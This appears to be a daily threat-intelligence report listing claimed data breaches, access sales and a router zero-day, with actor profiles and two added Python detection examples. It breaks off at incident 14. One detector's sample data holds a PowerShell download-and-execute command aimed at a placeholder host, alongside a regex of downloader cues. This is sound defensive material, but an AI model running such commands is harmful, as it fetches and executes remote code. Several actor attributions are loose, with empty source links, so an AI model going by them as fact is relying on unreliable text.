[July-02-2025] Daily Cybersecurity Threat Report

Executive Summary

This daily cybersecurity threat report provides a comprehensive overview of significant incidents observed over the past 24 hours, based on intelligence gathered from open and dark web sources. The period reveals a dynamic threat landscape dominated by financially motivated cybercriminals engaged in extensive data breaches and sales, alongside persistent hacktivist activities. Key observations include a high volume of data leaks impacting various sectors globally, the continued sale of initial access vectors to corporate networks, and the proliferation of sophisticated malware and phishing toolkits. Threat actors leverage diverse tactics, from exploiting vulnerabilities in routers and web applications to employing advanced social engineering and ransomware-as-a-service models. The report details specific incidents, profiles the involved threat actors where information is available, and highlights the broader implications for organizational and individual security.

The analysis of incidents from the past 24 hours underscores several critical trends shaping the current cybersecurity environment:

  • Prevalence of Data Breaches and Leaks: The majority of reported incidents involve data breaches and leaks, indicating a strong focus by threat actors on acquiring and monetizing sensitive information. These range from personally identifiable information (PII) of citizens and consumers to highly confidential corporate and financial documents. The sheer volume of data being exfiltrated and offered for sale suggests a robust underground market for compromised information.
  • Financial Motivation Dominates: A significant proportion of the observed activity is driven by financial gain. Threat actors are actively selling stolen databases, corporate identities, network access, and sophisticated hacking tools. This commercialization of cybercrime resources lowers the barrier for entry, enabling a wider array of malicious actors to conduct attacks.
  • Emergence and Evolution of Threat Actors: While some incidents are attributed to known groups or their affiliates (e.g., Hellcat, LulzSec, Hacktivist of Garuda, Worldleaks), many involve individual or less-documented actors. This highlights the fluid nature of the cybercrime ecosystem, where new entities constantly emerge, often specializing in specific attack vectors or data types. The evolution of ransomware-as-a-service (RaaS) and extortion-as-a-service (EaaS) models further enables these actors by providing ready-made tools and infrastructure.
  • Persistent Hacktivism: Hacktivist groups continue to be active, primarily engaging in website defacements and data breaches. Their motivations often stem from geopolitical conflicts or ideological stances, as evidenced by groups targeting specific countries or industries in retaliation for perceived grievances.
  • Global Reach of Attacks: Incidents span multiple continents, with significant activity observed in the USA, India, Thailand, Germany, Australia, Israel, Tunisia, UK, Peru, Spain, Ukraine, Iran, Romania, Portugal, and Kenya. This global distribution underscores the borderless nature of cyber threats and the need for international collaboration in defense.
  • Diverse Victim Industries: A wide array of industries is being targeted, including Healthcare & Pharmaceuticals, Education, Information Technology (IT) Services, Financial Services, E-commerce, Government Administration, Venture Capital, and Social Media. This broad targeting indicates that threat actors are opportunistic, exploiting vulnerabilities across various sectors to achieve their objectives.
  • Focus on Initial Access Sales: A notable trend is the explicit sale of initial access credentials and privileges (e.g., admin panel access, domain admin, RDP, SSH, VPN access). This commoditization of network entry points facilitates further, more damaging attacks, including ransomware deployment and extensive data exfiltration, by reducing the effort required for follow-on operations.

Incident Analysis

1. Alleged Sale of 0day Vulnerability in Asus RT-AX Routers

  • Incident Overview:
  • Category: Vulnerability
  • Date: 2025-07-02T14:33:44Z
  • Threat Actor: skart7
  • Incident Description: A threat actor, identified as “skart7,” is reportedly offering for sale a zero-day vulnerability impacting Asus RT-AX routers. This vulnerability is described as allowing pre-authentication remote code execution (RCE), meaning it can be exploited without any prior authentication and requires no user interaction. Such a flaw could enable a complete compromise of affected devices, posing a severe risk to home and small office networks utilizing these routers.
  • Threat Actor Profile: skart7 (Scattered Spider)
  • “skart7” is associated with the notorious cybercriminal group Scattered Spider [1]. This group has gained significant notoriety for compromising major entertainment and hospitality firms in the United States, including Caesars Entertainment and MGM Resorts International [2]. Scattered Spider, also known by aliases such as UNC3944, 0ktapus, Muddled Libra, Scatter Swine, Storm-0875, Octo Tempest, LUCR-3, and Star Fraud, comprises individuals reportedly aged 19 to 22 as of September 2023 [2]. Some members of this group have recently been arrested in the UK and USA [2].
  • Motivations: Scattered Spider’s primary motivation is data theft for extortion [2]. They are also known to deploy BlackCat/ALPHV ransomware in conjunction with their data theft activities [2]. The sale of a zero-day vulnerability aligns with a financially motivated group seeking to monetize high-value exploits.
  • Key TTPs: Scattered Spider primarily gains initial access through social engineering, frequently employing SMS phishing (smishing) campaigns and phone calls to victim help desks to obtain password reset links or MFA bypass codes [2]. They also utilize SIM swapping attacks to acquire one-time security codes [2]. The group has deployed various phishing kits, including EIGHTBAIT [2]. For persistence, they use legitimate software like AnyDesk and ScreenConnect, often installing multiple Remote Monitoring and Management (RMM) tools to ensure backdoor access [2]. They are proficient at defense evasion, disabling antivirus, host-based firewalls, and EDR products, and setting up unmanaged cloud virtual machines [2]. They also manipulate Active Directory accounts to bypass SIEM monitoring [2]. Their operations involve credential access/dumping tools like Mimikatz and Impacket, and they move laterally using RDP and SSH [2]. The offering of a zero-day vulnerability indicates a high level of technical sophistication, allowing them to bypass traditional security measures and gain deep initial access. This aligns with their history of exploiting vulnerabilities and maintaining persistent, stealthy access.
  • Source Links:

2. H3C4KEDZ targets the website of Amity Technology And Service

  • Incident Overview:
  • Category: Defacement
  • Date: 2025-07-02T14:32:06Z
  • Victim: Amity Technology And Service Co., Ltd. (Information Technology (IT) Services, Thailand)
  • Threat Actor: H3C4KEDZ
  • Incident Description: The H3C4KEDZ group claims to have defaced the website of Amity Technology And Service Co., Ltd., a Thai IT services company. Website defacement is a common tactic used by hacktivist groups to publicly declare a breach, convey a political or ideological message, or simply demonstrate their capabilities.
  • Threat Actor Profile: H3C4KEDZ (Hellcat Hacking Group)
  • H3C4KEDZ is associated with the Hellcat Hacking Group, which emerged in late 2024, initially known as “ICA Group” [3]. This group gained notoriety for high-profile attacks on major corporations such as Schneider Electric, Telefónica, and Orange Romania [3]. Hellcat is primarily led by two key threat actors: Rey (previously Hikki-Chan, ggyaf, o5tdev) and Pryx (also known as HolyPryx) [3].
  • Motivations: Hellcat’s motivations appear to be a blend of notoriety, financial gain (from data leaks and selling malware), and hacktivism [3]. Rey, identifying as a “Palestinian hacker,” expresses a cynical view of the hacker community and often includes hate speech and toxic rhetoric in online messages [3]. Pryx has also made controversial and offensive statements [3]. The defacement of an IT services company’s website aligns with Rey’s initial focus on website defacements and the group’s overall aim to publicize their activities and cause disruption.
  • Key TTPs: Rey’s operations frequently involve exploiting Jira credentials to gain access to sensitive data [3]. Pryx has claimed to develop a “unique server-side stealer” that uses Tor-based services for data exfiltration [3]. Both Rey and Pryx have been involved in high-profile data breaches and data leaks, with Pryx also selling malware like an AES256-based crypter [3]. They maintain an aggressive online presence, using platforms like Telegram and X (Twitter) to share leaks and publicize operations [3]. Ironically, both Rey and Pryx, despite their use of infostealer logs in their operations, became victims of infostealers themselves (Rey was infected by Redline and Vidar stealers) [3].
  • Source Links:

3. NXBB.SEC claims to target Cholangiocarcinoma Foundation of Thailand

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T14:22:01Z
  • Victim: Cholangiocarcinoma Foundation of Thailand (Hospital & Health Care, Thailand)
  • Threat Actor: NXBB.SEC
  • Incident Description: The NXBB.SEC group claims to have gained initial access to the Cholangiocarcinoma Foundation of Thailand. Gaining initial access is a critical first step in many cyberattacks, often preceding data exfiltration, system disruption, or the deployment of further malicious payloads. For a healthcare foundation, such access could compromise sensitive patient data or disrupt critical research.
  • Threat Actor Profile: NXBB.SEC (Potential LulzSec Affiliation/Inspired Group)
  • While “NXBB.SEC” is not directly named in the provided information, its naming convention (e.g., .SEC) and the nature of its reported activities (initial access, defacement in other contexts) suggest a possible affiliation with or inspiration from hacktivist groups like LulzSec [4]. LulzSec (a contraction of Lulz Security) was a grey hat computer hacking group active in 2011, known for high-profile attacks and affiliations with Anonymous and AntiSec [4].
  • History & Profile (LulzSec context): LulzSec emerged from the “Internet Feds” group and was composed of seven core members, led by “Sabu” (Hector Xavier Monsegur) [4]. They gained attention for their high-profile targets, including the PlayStation Network and the CIA website, and for the sarcastic messages they posted after attacks [5].
  • Motivations (LulzSec context): The original LulzSec group primarily hacked “for the lulz” (for fun and to cause mayhem), but they also articulated political messages. These included exposing insecure systems, highlighting the dangers of password reuse, protesting government censorship and monitoring of the internet, and opposing the War on Drugs [5]. If NXBB.SEC operates under similar principles, their motivation for targeting a healthcare foundation could be to expose vulnerabilities within the sector, make a public statement, or simply cause disruption.
  • Key TTPs (LulzSec context): Their tactics included Denial of Service (DoS) attacks against websites (e.g., Visa, MasterCard, PayPal), breaking into computer systems, stealing confidential information, publicly disclosing stolen data, hijacking email and Twitter accounts, and defacing websites [4]. The “Initial Access” category for this incident directly aligns with LulzSec’s methods of gaining unauthorized entry to systems as a precursor to other activities.
  • Source Links:

4. Alleged data breach of US Medical Labs Inc.

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T14:05:35Z
  • Victim: US Medical Labs Inc. (Healthcare & Pharmaceuticals, USA)
  • Threat Actor: kanie2903
  • Incident Description: The threat actor “kanie2903” claims to have breached the database of US Medical Labs Inc., a healthcare and pharmaceuticals company in the USA. The exfiltrated data reportedly includes sensitive personal information such as names, phone numbers, and email addresses. This type of data is highly valuable on underground markets for purposes like phishing, identity theft, and other forms of fraud.
  • Threat Actor Profile: kanie2903
  • No specific information about “kanie2903” is available in the provided research material. This suggests that “kanie2903” is either a relatively new or less publicly documented individual threat actor, or an alias that has not been explicitly associated with known groups in the provided intelligence.
  • Motivations: Given the nature of the compromised data (PII) and its typical value on dark web markets, the primary motivation behind this breach is highly likely financial gain. The actor likely intends to sell this information to other cybercriminals who can then leverage it for various illicit activities.
  • TTPs: While specific tactics, techniques, and procedures (TTPs) for “kanie2903” are unknown, the successful breach of a database implies the use of common methods such as exploiting web application vulnerabilities (e.g., SQL injection), misconfigured servers, or compromised credentials obtained through phishing or brute-force attacks. The targeting of a healthcare entity suggests a focus on sectors rich in sensitive personal data.
  • Source Links:

5. Alleged data sale of German Citizens

  • Incident Overview:
  • Category: Data Leak
  • Date: 2025-07-02T13:45:43Z
  • Victim: Residents of Berlin, Germany (General Public)
  • Threat Actor: 570RM
  • Incident Description: A threat actor operating under the alias “570RM” claims to be selling a dataset containing 26,000 lines of information pertaining to residents of Berlin, Germany. The actor states that the data was extracted via brute-force access from an undisclosed service. This incident represents a direct threat to the privacy of German citizens, as their personal information could be used for targeted scams, identity theft, or other malicious purposes.
  • Threat Actor Profile: 570RM
  • No direct information about “570RM” as a specific threat actor is available in the provided research material. The snippets related to this query discuss “DEVMAN,” a ransomware actor, and “SideWinder,” an Indian-affiliated nation-state cyber espionage group [6]. These groups are not directly linked to “570RM.” Therefore, “570RM” is likely a new or less publicly documented individual or group, or an alias not explicitly connected in the available intelligence.
  • Motivations: The explicit mention of “sale” of data strongly indicates that the primary motivation behind this leak is financial gain. The actor seeks to profit from the unauthorized acquisition and distribution of personal information.
  • TTPs: The stated method of acquisition, “brute-force access,” points to a common, albeit often unsophisticated, technique for gaining unauthorized entry. This method typically involves systematically trying numerous combinations of usernames and passwords against a target service until a correct one is found. This technique is particularly effective against systems with weak password policies or exposed login portals.
  • Source Links:
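
The brute-force pattern described above, seen from the defender's side: the following Python, added here as an example and not part of the report, flags a burst of failed logins from one source and a success from that source while the burst is still inside the window. The log format, the threshold, the window, and all sample lines are assumptions.

```python
"""Brute-force login detection over constructed authentication log lines.

Two patterns are flagged: a burst of failed logins from one source within a
sliding window, and a successful login from that same source while the burst
is still inside the window, which is the "brute-force access" pattern above.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (not real data). Format is an assumption:
# <ISO timestamp> <FAILED|SUCCESS> user=<name> src=<ip>
SAMPLE_LOG = """\
2025-07-02T10:00:01Z FAILED user=anna src=203.0.113.7
2025-07-02T10:00:02Z FAILED user=anna src=203.0.113.7
2025-07-02T10:00:03Z FAILED user=admin src=203.0.113.7
2025-07-02T10:00:04Z FAILED user=admin src=203.0.113.7
2025-07-02T10:00:05Z FAILED user=anna src=203.0.113.7
2025-07-02T10:00:06Z SUCCESS user=anna src=203.0.113.7
2025-07-02T10:00:10Z FAILED user=bob src=198.51.100.9
2025-07-02T10:30:00Z FAILED user=bob src=198.51.100.9
2025-07-02T10:30:05Z SUCCESS user=bob src=198.51.100.9
2025-07-02T11:00:00Z SUCCESS user=carol src=192.0.2.5
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<result>FAILED|SUCCESS)\s+user=(?P<user>\S+)\s+src=(?P<src>\S+)$"
)


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "result": m["result"],
        "user": m["user"],
        "src": m["src"],
    }


def detect_bruteforce(log_text, threshold=5, window=timedelta(minutes=5)):
    """Return alerts for failure bursts and for successes that follow a burst.

    Lines are expected in chronological order, as a log file normally is.
    Counting per source rather than per user also catches password spraying,
    where one source tries a few passwords against many accounts.
    """
    recent_failures = defaultdict(deque)  # src -> timestamps of failures in window
    burst_alerted = set()                 # sources already reported for a burst
    alerts = []
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        q = recent_failures[ev["src"]]
        while q and ev["ts"] - q[0] > window:  # expire failures outside the window
            q.popleft()
        if ev["result"] == "FAILED":
            q.append(ev["ts"])
            if len(q) >= threshold and ev["src"] not in burst_alerted:
                burst_alerted.add(ev["src"])
                alerts.append({"type": "failure_burst", "src": ev["src"],
                               "failures": len(q), "ts": ev["ts"]})
        elif len(q) >= threshold:
            # A success while the burst is still in the window: likely a guessed password.
            alerts.append({"type": "success_after_burst", "src": ev["src"],
                           "user": ev["user"], "ts": ev["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

Bob's two failures fall outside the five-minute window of each other, so his later success is not flagged; lowering the threshold or widening the window changes that trade-off.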

6. Alleged database breach of GreenHills Ventures, LLC

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T13:40:57Z
  • Victim: GreenHills Ventures, LLC (Venture Capital, USA)
  • Threat Actor: sentap
  • Incident Description: The threat actor “sentap” claims to be selling the database of GreenHills Ventures, LLC, a U.S.-based venture capital firm. The compromised data is exceptionally sensitive and comprehensive, including legal documents (NDAs, term sheets, shareholder agreements), financial data (statements, cap tables, forecasts), technology information (product profiles, intellectual property documents), business strategies (pitch decks, due diligence materials), and organizational data (charts, compensation reports). The exposure of such critical and proprietary information poses severe risks, including corporate espionage, insider trading, competitive disadvantage, and targeted fraud against the firm or its portfolio companies.
  • Threat Actor Profile: sentap
  • “Sentap” is an active actor on predominantly Russian-speaking dark web forums, such as xss [8].
  • Motivations: “Sentap” is primarily financially motivated, focusing on high-effort, high-payoff activities in the cybercrime landscape [8]. The sale of highly confidential corporate data from a venture capital firm, which includes strategic and financial intelligence, aligns perfectly with this motivation, as such information can command a high price on underground markets.
  • Key TTPs:
  • Data Acquisition: In a previous incident, “sentap” claimed to have obtained “unprecedented” access to data from the cloud infrastructure of a U.S.-based title company [8]. This suggests a proficiency in exploiting cloud security vulnerabilities or compromising cloud-based credentials to gain deep access to organizational data. The current breach of GreenHills Ventures’ database likely involved similar sophisticated access methods.
  • Malicious Activities: Observations indicate “sentap” has been involved in a range of malicious cyber activities, including website cloning, bypassing Web Application Firewalls (WAFs), and crypto draining [8]. While the specifics of how these activities are executed are not detailed in the provided information, their involvement points to a diverse toolkit and a high level of technical proficiency in circumventing security measures.
  • Communication: “Sentap” prefers to be contacted via the XMPP messaging protocol Jabber or through direct messages on the forums where they advertise, rather than engaging in public discussions within the threads [8]. This preference indicates a desire for discretion and direct negotiation for high-value data.
  • Data Monetization: “Sentap” actively advertises stolen data, emphasizing its value and potential for long-term analysis, particularly if it includes personally identifiable information (PII) such as names, addresses, Social Security numbers, and mortgage details from property-related documents [8]. The detailed listing of the types of documents stolen from GreenHills Ventures underscores their understanding of the market value of such comprehensive corporate intelligence.
  • Source Links:

7. Alleged data leak of M.I.S (Marketing Information System)

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T13:37:25Z
  • Victim: M.I.S (Marketing Information System) (Market Research, Israel)
  • Threat Actor: USTINT
  • Incident Description: The USTINT group claims to have leaked a database belonging to M.I.S (Marketing Information System), an Israeli market research firm. The compromised data includes 2,000 names, card data, email addresses, IP addresses, and email screenshots. This combination of personally identifiable information (PII) and financial data is highly valuable for various forms of fraud, including credit card fraud, phishing campaigns, and identity theft.
  • Threat Actor Profile: USTINT
  • No specific information about “USTINT” is available in the provided research material. The snippets for this query refer to “Austin Hackers Anonymous” (AHA!) and “Derp (hacker group),” neither of which is directly linked to “USTINT” [10]. This indicates that “USTINT” is likely a new or less publicly documented individual or group, or an alias not explicitly connected in the available intelligence.
  • Motivations: The nature of the leaked data, specifically card data, emails, and IP addresses, strongly suggests that the primary motivation is financial gain. The group likely intends to sell this sensitive information on underground markets to other cybercriminals.
  • TTPs: The successful breach and exfiltration of a database containing such detailed information point to common web application or network exploitation techniques. These could include SQL injection attacks, exploitation of misconfigured databases, or the use of compromised credentials obtained through phishing or brute-force methods. The inclusion of “email screenshots” suggests a deeper level of access or a targeted approach to collecting evidence of compromise.
  • Source Links:

8. Alleged sale of Australia database

  • Incident Overview:
  • Category: Data Leak
  • Date: 2025-07-02T13:35:19Z
  • Victim: Unspecified Australian entity/citizens (Australia)
  • Threat Actor: w.w.d.o.c.
  • Incident Description: The threat actor “w.w.d.o.c.” claims to be selling a database originating from Australia, containing 24,000 client records. The most alarming aspect of this leak is the inclusion of highly sensitive identity documents such as Driver’s Licenses, Passports, and Medicare numbers. This information represents a severe risk for widespread identity theft, fraudulent document creation, and other sophisticated financial crimes targeting Australian citizens.
  • Threat Actor Profile: w.w.d.o.c.
  • No direct information about “w.w.d.o.c.” is available in the provided research material. The snippets related to this query discuss “GIFTEDCROOK malware” and “Packrat,” which are not directly linked to “w.w.d.o.c.” [12]. This indicates that “w.w.d.o.c.” is likely a new or less publicly documented individual or group.
  • Motivations: The explicit “sale” of a database containing highly valuable identity documents clearly indicates that the primary motivation is financial gain. The market for such comprehensive identity data is lucrative, as it enables a wide range of illicit activities.
  • TTPs: While specific TTPs are unknown, the acquisition of such sensitive and official identity documents often requires sophisticated methods. These could include successful phishing campaigns targeting individuals or organizations holding such data, deployment of advanced information-stealing malware, or direct breaches of government or institutional databases that store these records. The scale of 24,000 records suggests either a significant compromise of a single entity or an aggregation of data from multiple smaller breaches.
  • Source Links:

9. LulzSec Black claims to target Liechtenstein

  • Incident Overview:
  • Category: Alert
  • Date: 2025-07-02T13:26:04Z
  • Victim: Digital infrastructure of Liechtenstein (Information Technology (IT) Services, Liechtenstein)
  • Threat Actor: LulzSec Black
  • Incident Description: The group “LulzSec Black” has issued a public alert, declaring their intention to target the digital infrastructure of Liechtenstein. This type of public declaration is characteristic of hacktivist groups, often serving as a warning or a statement of intent that precedes disruptive cyberattacks such as Distributed Denial of Service (DDoS) campaigns, website defacements, or data breaches.
  • Threat Actor Profile: LulzSec Black (LulzSec Offshoot)
  • “LulzSec Black” is highly likely an offshoot or a group adopting the moniker and ideology of the original LulzSec group [4]. The original LulzSec (a contraction of Lulz Security) was a grey hat computer hacking group active in May-June 2011, known for its high-profile attacks and affiliations with Anonymous and AntiSec [4].
  • History & Profile (LulzSec context): The original LulzSec gained notoriety for compromising user accounts from PlayStation Network in 2011 and for taking the CIA website offline [5]. They were distinctive for their sarcastic messages posted in the aftermath of their attacks [5]. LulzSec consisted of seven core members and was led by “Sabu” (Hector Xavier Monsegur) [4].
  • Motivations: The original LulzSec group’s primary motivation was to “have fun by causing mayhem” (“for the lulz”), but they also claimed political motivations [5]. These included drawing attention to insecure systems, highlighting the dangers of password reuse, and expressing opposition to government censorship and monitoring of the internet, as well as the War on Drugs [5]. LulzSec Black’s public declaration against Liechtenstein’s digital infrastructure suggests a similar hacktivist motivation, possibly aiming for disruption, a political statement, or to expose perceived vulnerabilities, rather than direct financial gain.
  • Key TTPs (LulzSec context): The tactics employed by the original LulzSec group included Denial of Service (DoS) attacks against websites (e.g., Visa, MasterCard, PayPal), breaking into computer systems, stealing confidential information, publicly disclosing stolen data, hijacking victims’ email and Twitter accounts, and defacing websites [4]. The “Alert” category for this incident suggests a precursor to such disruptive actions, consistent with the historical operations of LulzSec and its affiliates.
  • Source Links:

10. Alleged data sale of WhatsApp users

  • Incident Overview:
  • Category: Data Leak
  • Date: 2025-07-02T13:13:45Z
  • Victim: WhatsApp Inc. (Social Media & Online Social Networking, USA)
  • Threat Actor: Machine1337
  • Incident Description: The threat actor “Machine1337” claims to be selling a massive dataset containing information on 520 million WhatsApp users, along with 60,000 sample records to prove authenticity. This represents an extremely large-scale data leak with profound privacy implications for a global user base, potentially exposing personal details to a wide array of malicious actors for targeted scams, identity theft, or social engineering campaigns.
  • Threat Actor Profile: Machine1337 (EnergyWeaponsUser)
  • “Machine1337” is also known by the alias “EnergyWeaponsUser” [14].
  • History & Profile: This actor has a history of involvement in large-scale data theft, having been linked to the compromise and theft of more than 89 million user records, which included one-time access codes, in previous incidents [14]. While the provided snippets also mention “Dragonfly” [37], the direct link to “EnergyWeaponsUser” and large-scale user record theft is more relevant to “Machine1337” and this incident.
  • Motivations: The explicit “sale” of a massive user database clearly indicates that the primary motivation is financial gain. The inclusion of “one-time access codes” in past incidents suggests a focus on acquiring credentials and sensitive authentication data for potential account takeover, which can be further monetized through various illicit means. The scale of the alleged WhatsApp leak aligns with an actor focused on high-volume data monetization.
  • Key TTPs: Their past activities, specifically the theft of user records and one-time access codes, imply a proficiency in exploiting vulnerabilities that grant access to large user databases. These could include web application flaws, API vulnerabilities, or large-scale credential stuffing attacks. The success in allegedly compromising such a widely used platform like WhatsApp suggests a sophisticated or highly successful attack vector, potentially involving zero-day exploits or a significant breach of internal systems.
  • Source Links:

11. Alleged leak of unauthorized admin access to OwlCom

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T13:08:45Z
  • Victim: OwlCom (Graphic & Web Design, Tunisia)
  • Threat Actor: mecrobyte
  • Incident Description: The threat actor “mecrobyte” claims to have obtained full admin panel access to OwlCom, a graphic and web design company in Tunisia. This level of compromise includes control over settings, user management, and internal resources. Such extensive access poses significant risks, including service disruption, widespread data exposure, website defacement, and the potential for further lateral movement within the organization’s network or its clients’ systems.
  • Threat Actor Profile: mecrobyte
  • No specific information about “mecrobyte” is available in the provided research material. This suggests that “mecrobyte” is either a new or less publicly documented individual threat actor, or an alias that has not been explicitly associated with known groups in the provided intelligence.
  • Motivations: The primary motivation is highly likely financial gain, as “mecrobyte” is also observed in another incident selling root access to the Tunisian Post Office server. This pattern indicates a focus on acquiring and monetizing high-privilege access to various organizations.
  • TTPs: Gaining full admin panel access typically involves exploiting common web application vulnerabilities (e.g., weak authentication, insecure direct object references, or known CMS vulnerabilities), brute-forcing credentials, or compromising legitimate credentials through phishing or malware. The ability to control “internal resources” suggests a broader compromise beyond just the public-facing website.
  • Source Links:

12. Alleged Sale of Domain Admin Access to UK-Based Global Provider Company

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T12:53:02Z
  • Victim: Unidentified UK-based global provider company (UK)
  • Threat Actor: shiitbaby
  • Incident Description: The threat actor “shiitbaby” claims to be selling unauthorized access to a UK-based global provider company, specifically advertising domain admin privileges. This level of access is among the most critical an attacker can obtain, granting full control over the organization’s entire IT infrastructure, including user accounts, servers, and data. Such access is highly valuable for deploying ransomware, conducting extensive data theft, establishing long-term persistence, or facilitating supply chain attacks.
  • Threat Actor Profile: shiitbaby
  • No specific information about “shiitbaby” is available in the provided research material. This suggests that “shiitbaby” is either a new or less publicly documented individual threat actor, or an alias not explicitly associated with known groups in the provided intelligence.
  • Motivations: The explicit “sale” of domain admin access clearly indicates that the primary motivation is financial gain. Access of this caliber commands a very high price on underground forums due to the immense control it provides.
  • TTPs: Obtaining domain admin privileges typically requires sophisticated exploitation of network vulnerabilities, weaknesses in Active Directory configurations, or highly effective social engineering campaigns that lead to the compromise of privileged credentials. It often involves a multi-stage attack, starting with initial access and then escalating privileges to achieve full domain control.
  • Source Links:

13. Alleged leak of 100K cracking Marketplace database

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T12:47:00Z
  • Victim: Cracking darknet marketplace (Unspecified)
  • Threat Actor: DigitalGhost
  • Incident Description: The threat actor “DigitalGhost” claims to have leaked a database containing information on 100,000 users from the “Cracking” darknet marketplace. This incident highlights the inherent risks within the cybercrime ecosystem itself, demonstrating that even illicit platforms are vulnerable to breaches. The compromised data, likely including usernames, hashed passwords, and potentially other PII, could be used for credential stuffing attacks against other services where users might reuse passwords, or to identify individuals involved in illicit activities.
  • Threat Actor Profile: DigitalGhost (Ghost Ransomware Actor)
  • “DigitalGhost” is associated with the Ghost ransomware actor, also known by numerous aliases including Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture [15]. It is important to note that a separate snippet [38] refers to “GE Digital Ghost,” which is a defensive product and not related to this threat actor.
  • History & Profile: The Ghost ransomware actor has been active since early 2021, primarily targeting internet-facing services that run outdated versions of software and firmware [15]. This group is based in China and conducts widespread attacks across more than 70 countries, compromising a diverse range of victims including critical infrastructure, schools, healthcare organizations, government networks, religious institutions, and small-to-medium businesses [15].
  • Motivations: The primary motivation of the Ghost ransomware actor is financial gain [15]. While this specific incident is a data leak from a darknet market rather than a direct ransomware attack on a traditional victim, it could serve several purposes for a financially motivated group: demonstrating capability to attract affiliates, disrupting competitors in the cybercrime space, or acquiring credentials that can be leveraged for further attacks against other targets.
  • Key TTPs:
  • Initial Access: Ghost actors commonly obtain initial access by exploiting publicly available Common Vulnerabilities and Exposures (CVEs) in internet-facing applications. These have included vulnerabilities in Fortinet FortiOS appliances (CVE-2018-13379), servers running Adobe ColdFusion (CVE-2010-2861 and CVE-2009-3960), Microsoft SharePoint (CVE-2019-0604), and Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) [15].
  • Execution & Persistence: They have been observed uploading web shells to compromised servers and leveraging Windows Command Prompt and PowerShell to download and execute Cobalt Strike Beacon malware, which is then implanted on victim systems [15]. They also sporadically create new local and domain accounts or change passwords for existing accounts to maintain persistence [15].
  • Privilege Escalation: Ghost actors often utilize built-in Cobalt Strike functions to steal process tokens running under the SYSTEM user context, allowing them to impersonate the SYSTEM user and rerun Beacon with elevated privileges [15].
  • Ransomware Operations: They are known for rotating their ransomware executable payloads, switching file extensions for encrypted files, and modifying ransom note text, which complicates attribution [15]. They often proceed from initial compromise to the deployment of ransomware within the same day, indicating a highly efficient operational tempo [15].
  • Command and Control (C2): For communication with victims, Ghost actors use legitimate email services that include traffic encryption features, such as Tutanota, Skiff, and ProtonMail [15].
  • Source Links:
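The execution chain in the Key TTPs above (web shell on an internet-facing server, then Command Prompt or PowerShell used to pull down and run a Beacon) leaves a recognisable trace in process-creation telemetry: a web server worker process spawning a shell, and a PowerShell command line carrying download or in-memory execution cues. The detection logic below is an added example, not part of the report or of any vendor's ruleset; it runs over constructed Sysmon-style (Event ID 1) records, and the web-server and shell image lists are assumptions to be tuned per environment.

```python
"""Flag the web-shell -> shell -> PowerShell downloader chain in process-creation events.

Added example, not from the report. Field names follow Sysmon Event ID 1
(UtcTime, ParentImage, Image, CommandLine); all event data below is constructed.
"""
import re

# Worker processes of common web/application servers (assumed list; tune per environment).
# A cmd.exe or powershell.exe child of one of these is a classic web-shell indicator.
WEB_SERVER_IMAGES = {"w3wp.exe", "httpd.exe", "nginx.exe", "php-cgi.exe", "coldfusion.exe", "tomcat9.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Command-line fragments typical of PowerShell being used as a downloader or in-memory loader.
DOWNLOAD_CUES = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression|"
    r"net\.webclient|bitsadmin|certutil.*-urlcache|frombase64string)",
    re.IGNORECASE,
)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of finding labels for one process-creation event (empty if benign)."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    findings = []
    if parent in WEB_SERVER_IMAGES and image in SHELL_IMAGES:
        findings.append("webshell_shell_spawn")
    if image in {"powershell.exe", "pwsh.exe"} and DOWNLOAD_CUES.search(cmdline):
        findings.append("powershell_download_cradle")
    return findings


def scan(events):
    """Return [(UtcTime, findings)] for every event that produced at least one finding."""
    return [(ev.get("UtcTime"), classify(ev)) for ev in events if classify(ev)]


# Constructed sample telemetry: two benign events and two that match the described chain.
# The URL is a placeholder (.invalid TLD), not a real indicator.
SAMPLE_EVENTS = [
    {"UtcTime": "2025-07-02 09:10:00", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir"},
    {"UtcTime": "2025-07-02 09:11:30", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"UtcTime": "2025-07-02 09:11:45", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://placeholder.invalid/a')"},
    {"UtcTime": "2025-07-02 09:15:00", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for when, findings in scan(SAMPLE_EVENTS):
        print(when, ", ".join(findings))
```

In practice the same two checks map onto Sysmon or EDR process-creation data with the image sets widened to the servers actually deployed; the second check also catches the download cradle when it is launched from outside a web server.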

14. Alleged Sale of Germany GmbH Corporate Identity data

  • Incident Overview:
